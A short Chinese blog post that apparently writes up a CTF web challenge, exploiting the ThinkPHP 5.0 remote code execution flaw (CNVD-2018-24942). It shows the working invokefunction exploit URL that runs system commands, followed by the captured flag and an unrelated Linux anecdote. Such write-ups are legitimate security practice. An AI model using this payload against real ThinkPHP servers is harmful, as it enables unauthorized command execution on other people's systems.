记攻防世界Thinkphp5.0漏洞的rce题目

发布于 2021-11-22  81 次阅读


5.0

今晚我做Ctfshow环境一直503,于是就想到了去刷刷攻防世界的高手区Web,没想到做到第三道题我就卡了。

进去之后是Thinkphp,Thinkphp我有一点了解,建站的时候有一些程序就是基于Thinkphp框架,需要设置Thinkphp伪静态。而这个让我有一点懵,随后我去查了Thinkphp现在已经到V6.09了。结合题目写的rce,应该是这个版本的thinkphp有漏洞,利用漏洞注入。

然后查到了Thinkphp5.0的远程代码执行漏洞(CNVD-2018-24942)

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

然后查看根目录发现flag文件夹,这里我一直以为是里面有flag目录,最后发现是文件名叫/flag 使用cat得到flag

flag{thinkphp5_rce}

这使我想起来我去年刚开始入门Linux的时候,要往Systemd里面添加守护进程,我在/usr/lib/system里面创建了systemd文件夹,但是每次我cd都提示我 not a directory,最后才发现,我创建的是一个叫systemd的空文件。